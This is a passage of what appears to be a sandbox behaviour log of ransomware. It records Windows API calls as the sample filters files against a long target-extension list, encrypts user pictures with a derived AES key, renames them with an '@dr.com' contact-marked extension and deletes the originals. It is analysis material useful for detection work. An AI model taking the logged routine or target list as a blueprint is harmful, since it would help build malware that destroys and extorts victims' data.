.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.732] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.732] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.732] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.736] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x15992, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x15992, lpOverlapped=0x0) returned 1
	[0195.739] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.740] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0195.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.742] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.742] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.742] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0195.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.743] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x15992, dwBufLen=0x15992 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x159a0) returned 1
	[0195.749] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.749] RtlMoveMemory (in: Destination=0xff2b20, Source=0xfdd180, Length=0x15992 | out: Destination=0xff2b20) 
	[0195.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.749] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2b20*, pdwDataLen=0x18bc0c*=0x15992, dwBufLen=0x159a0 | out: pbData=0xff2b20*, pdwDataLen=0x18bc0c*=0x159a0) returned 1
	[0195.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.752] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0195.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.752] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0195.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.752] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0195.752] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.753] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.753] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.754] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 97
	[0195.755] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.755] WriteFile (in: hFile=0x2c0, lpBuffer=0xff2b20*, nNumberOfBytesToWrite=0x159a0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff2b20*, lpNumberOfBytesWritten=0x18c068*=0x159a0, lpOverlapped=0x0) returned 1
	[0195.762] CloseHandle (hObject=0x2c0) returned 1
	[0195.762] CloseHandle (hObject=0x384) returned 1
	[0195.762] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif")) returned 1
	[0195.770] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif")) returned 0
	[0195.771] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5010f860, ftCreationTime.dwHighDateTime=0x1d96759, ftLastAccessTime.dwLowDateTime=0xd7d9df00, ftLastAccessTime.dwHighDateTime=0x1d96c9f, ftLastWriteTime.dwLowDateTime=0xd7d9df00, ftLastWriteTime.dwHighDateTime=0x1d96c9f, nFileSizeHigh=0x0, nFileSizeLow=0x3fd6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lJD6K_jcPnMQhcg6TIhM.png", cAlternateFileName="LJD6K_~1.PNG")) returned 1
	[0195.771] lstrcmpW (lpString1="lJD6K_jcPnMQhcg6TIhM.png", lpString2="..") returned 1
	[0195.771] lstrcmpW (lpString1="lJD6K_jcPnMQhcg6TIhM.png", lpString2=".") returned 1
	[0195.771] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.771] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="lJD6K_jcPnMQhcg6TIhM.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\lJD6K_jcPnMQhcg6TIhM.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\lJD6K_jcPnMQhcg6TIhM.png"
	[0195.771] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\lJD6K_jcPnMQhcg6TIhM.png") returned 55
	[0195.771] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.772] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\lJD6K_jcPnMQhcg6TIhM.png", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png") returned 0x37
	[0195.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.772] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.772] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png"
	[0195.772] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png") returned 55
	[0195.772] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.773] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0195.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.773] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.773] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.773] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.773] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ljd6k_jcpnmqhcg6tihm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.777] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3fd6, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x3fd6, lpOverlapped=0x0) returned 1
	[0195.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.780] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0195.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.782] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.782] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.782] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9b30) returned 1
	[0195.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.783] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x3fd6, dwBufLen=0x3fd6 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x3fe0) returned 1
	[0195.783] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.784] RtlMoveMemory (in: Destination=0xfe1160, Source=0xfdd180, Length=0x3fd6 | out: Destination=0xfe1160) 
